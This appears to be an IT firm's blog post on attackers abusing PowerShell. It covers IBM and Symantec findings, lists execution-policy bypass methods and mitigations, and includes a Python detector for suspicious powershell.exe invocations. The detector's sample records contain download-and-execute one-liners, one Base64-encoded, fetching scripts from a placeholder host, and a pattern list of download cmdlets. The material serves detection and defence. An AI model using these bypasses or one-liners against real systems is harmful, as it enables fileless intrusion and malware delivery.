More than Half of Cyberattacks Exploit Tools that Already Exist on Targeted Computers, Study Shows

A study conducted by IBM showed that more than half of cyberattacks rely not on malware but on common administration tools or other software that already exists on the targeted computers.

IBM’s 2019 X-Force Threat Intelligence Index showed that more than half (57%) of the attacks it analyzed did not use malware at all; many of them relied on common administration tools instead, and in doing so evaded detection, maintained persistence and achieved their objectives.

Living Off the Land

The phrase “living off the land” describes cyberattacks that rely on tools already present on the targeted computers. Because such activity blends in with routine administration work, it is harder to detect. According to IBM, one of the administration tools most often abused by attackers is PowerShell.

What Is PowerShell?

PowerShell is a task automation and configuration management framework that has been part of Windows for more than a decade. Its legitimate purpose is to let system administrators script repetitive tasks and manage systems remotely, wherever the administrator happens to be.

Microsoft released the first version of Windows PowerShell in 2006, and it has shipped by default with every Windows release since Windows 7. In 2016 the framework became open source, and it is now also available for Linux and macOS.

“Increasing awareness of cybersecurity issues and stricter security controls are making it harder for cybercriminals to establish footholds on target systems,” IBM said. “As a result, the use of malicious software in attacks appears to be on the decline. More than half (57 percent) of attacks analyzed by X-Force in 2018 did not leverage malware and many involved the use of non-malicious tools including PowerShell … to evade detection.”

Beyond automation and remote management, PowerShell reaches into nearly every system administration task, from network sniffing to reading out passwords. On the flip side, IBM observed attackers using these same legitimate functions to gather credentials “and then leveraged it to conduct network reconnaissance and data theft.”

Many PowerShell-based attacks use the tool as a downloader. Trojan.Kotver is one example of malware that abuses PowerShell. Once Kotver is on a computer, it checks whether Windows PowerShell is installed; if it is not, Kotver downloads PowerShell onto the compromised computer. Kotver then carries out click fraud: it silently loads large numbers of online advertisements on the compromised computer and automatically clicks them to earn fraudulent advertising revenue for the attacker.

PowerGhost is another malware family that abuses PowerShell. It mines cryptocurrency on compromised servers and workstations and can also take part in distributed denial-of-service (DDoS) attacks. During infection, PowerGhost runs a one-line PowerShell script that downloads a cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode and a reflective PE injection module.

According to Symantec, the preinstalled Windows PowerShell is one of the most popular choices in cybercriminals’ arsenals. Symantec said that from the second half of 2017 to the first half of 2018, it observed an increase of 661% in computers where malicious PowerShell activity was blocked.

Here are the top reasons why PowerShell is one of the most popular tools used to carry out cyberattacks:

  • It’s installed by default on Windows computers.
  • It can execute payloads directly from memory, which sidesteps traditional security controls designed to detect malware written to disk.
  • It offers remote management (PowerShell Remoting) out of the box, with encrypted traffic.
  • Cyber defenders often overlook PowerShell when hardening their systems.
  • Depending on how they are configured, application-whitelisting tools can be bypassed from PowerShell.
  • PowerShell has a growing community with readily available scripts, including offensive ones.
  • Many system administrators use and trust PowerShell, so abuse of it blends in with regular administration work.

By default, Microsoft restricts the running of PowerShell scripts through execution policies. The policy can be set to Restricted, AllSigned, RemoteSigned, Unrestricted or Bypass (a sixth value, Undefined, simply means no policy is set at that scope). Microsoft itself documents the execution policy as a safety feature rather than a security boundary, and attackers have found a number of ways around it. Here are some of the bypass methods compiled by Symantec:

  • Pipe the script into the standard input of powershell.exe, for example with the echo or type command.
  • Use the -Command argument to run a single command or script block supplied on the command line.
  • Use the -EncodedCommand argument to run a single Base64-encoded (UTF-16LE) command.
  • Pass -ExecutionPolicy Bypass or -ExecutionPolicy Unrestricted on the command line, which overrides the configured policy for that process.


Whenever attackers abuse PowerShell, they first have to get code running on the targeted computer. The initial infection vector is usually the same as for other attacks, most commonly phishing.

The best practices that prevent phishing therefore also apply to PowerShell abuse: delete suspicious emails, especially those with unexpected links or attachments, and do not enable macros in Microsoft Office documents.

Specific to PowerShell threats, here are some mitigating measures:

  1. Disable PowerShell if it serves no purpose at all in your organization, for example by blocking powershell.exe with application control for users who do not need it.
  2. If PowerShell can’t be avoided, monitor for unusual use of powershell.exe and wsmprovhost.exe (the host process for remote PowerShell sessions), especially from unknown locations, unknown users or at unusual times.
  3. Use the latest version of PowerShell. Newer versions add security features such as script block logging and constrained language mode; remove the legacy PowerShell 2.0 engine, which lacks this logging and can be selected with -Version 2 to sidestep it.
  4. Sign all internally used PowerShell scripts and set the execution policy to AllSigned so that unsigned scripts are blocked. Even though the policy is easy to bypass, it is an extra barrier attackers have to overcome. In any case, attempts to bypass the execution policy should be monitored and the gaps that allowed them should be closed.
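The bypass methods listed earlier and the monitoring recommended in the mitigations above are easier to act on with a concrete detector. The following Python script is an added example written for this article, not code from IBM, Symantec or Microsoft: it takes process-creation records (parent image, user, command line, as Sysmon Event ID 1 or Windows Security Event 4688 would provide), resolves powershell.exe’s abbreviated parameters, decodes -EncodedCommand payloads, and flags execution-policy overrides, scripts fed through standard input, hidden windows and in-memory download-and-execute one-liners. The sample records are constructed, the hosts use the reserved example.invalid domain, and the parent-process list and the parameter-prefix rules are my own assumptions for illustration.

```python
"""Flag suspicious powershell.exe invocations in process-creation records.

Added example for this article (not code from IBM, Symantec or Microsoft).
Records are (parent image, user, command line) tuples such as Sysmon Event
ID 1 or Windows Security Event 4688 would provide; samples are constructed.
"""
import base64
import re
from typing import List, Optional, Tuple

# Canonical powershell.exe parameter -> shortest prefix it accepts.  Assumption:
# the console host accepts unambiguous prefixes plus the aliases -ep and -ec.
PARAMS = {"executionpolicy": "ex", "encodedcommand": "e", "command": "c",
          "windowstyle": "w", "noprofile": "nop", "file": "f"}
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}

# Assumed starter list of parents that should rarely spawn PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "mshta.exe", "wscript.exe", "cscript.exe"}

# Cmdlets/.NET calls typical of in-memory download-and-execute one-liners.
DOWNLOAD_EXEC = re.compile(
    r"(?i)\b(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|"
    r"iwr|start-bitstransfer|net\.webclient|frombase64string)\b")


def split_args(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring double quotes
    (single quotes are ordinary characters to the Windows argument parser)."""
    args, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def canon(token: str) -> Optional[str]:
    """Resolve a (possibly abbreviated) -Parameter token to its canonical name."""
    if token[:1] not in ("-", "/"):
        return None
    key = token[1:].lower()
    if key in ALIASES:
        return ALIASES[key]
    for name, shortest in PARAMS.items():
        if name.startswith(key) and key.startswith(shortest):
            return name
    return None


def encode_command(script: str) -> str:
    """Build a -EncodedCommand value the way attackers do: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(value: str) -> Optional[str]:
    """Reverse encode_command; None if the value is not a valid payload."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(parent: str, user: str, cmdline: str) -> List[str]:
    """Return the suspicious indicators found in one record."""
    tags: List[str] = []
    args = split_args(cmdline)
    script = ""   # inline script text (literal or decoded) for pattern matching
    i = 1         # args[0] is the image itself
    while i < len(args):
        name = canon(args[i])
        value = args[i + 1] if i + 1 < len(args) else ""
        if args[i] == "-" or (name == "command" and value == "-"):
            tags.append("script piped via stdin")   # type x | powershell -
            i += 2 if name == "command" else 1
            continue
        if name == "executionpolicy":
            if value.lower() in ("bypass", "unrestricted"):
                tags.append(f"execution policy overridden ({value.lower()})")
            i += 1
        elif name == "encodedcommand":
            decoded = decode_encoded_command(value)
            tags.append("encoded command" if decoded is not None
                        else "encoded command (undecodable)")
            script = decoded or ""
            i += 1
        elif name == "command":
            tags.append("inline -Command")
            script = " ".join(args[i + 1:])  # the rest of the line is the script
            i = len(args)
        elif name == "windowstyle":
            if value.lower() == "hidden":
                tags.append("hidden window")
            i += 1
        i += 1
    if DOWNLOAD_EXEC.search(script):
        tags.append("download-and-execute in memory")
    if parent.lower() in OFFICE_PARENTS:
        tags.append("spawned by Office application or script host")
    return tags


def triage(events: List[Tuple[str, str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Return (user, cmdline, tags) for every record with at least one indicator."""
    hits = []
    for parent, user, cmdline in events:
        tags = analyze(parent, user, cmdline)
        if tags:
            hits.append((user, cmdline, tags))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # Signed script run by a scheduled task: should produce no indicators.
    ("taskeng.exe", "CORP\\svc-backup",
     "powershell.exe -NoProfile -File C:\\Scripts\\Backup-Logs.ps1"),
    # Office macro launching a hidden downloader with the policy overridden.
    ("WINWORD.EXE", "CORP\\bob",
     "powershell.exe -ExecutionPolicy Bypass -NoProfile -w hidden -c "
     "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""),
    # Same downloader hidden behind abbreviated switches and Base64.
    ("cmd.exe", "CORP\\bob",
     "powershell.exe -nop -ep unrestricted -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')")),
    # Script fed through standard input: the command line itself reveals nothing.
    ("cmd.exe", "NT AUTHORITY\\SYSTEM", "powershell.exe -noprofile -"),
    # Remote-session host running an inline command (worth a look, not alarming).
    ("wsmprovhost.exe", "CORP\\svc-deploy", 'powershell.exe -Command "Get-Service winrm"'),
]

if __name__ == "__main__":
    for user, cmdline, tags in triage(SAMPLE_EVENTS):
        print(f"{user}: {cmdline[:70]}")
        print("    -> " + ", ".join(tags))
```

The stdin case is the important caveat: when a script is piped in, the process command line carries no script text at all, so command-line monitoring alone cannot see what ran. That is the gap script block logging (Event ID 4104 in the PowerShell operational log) closes, and why mitigation 3 matters.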

When you need help managing your servers and mission-critical information security, our IT and security experts are a phone call away. Contact us today or call (416) 920-3000.
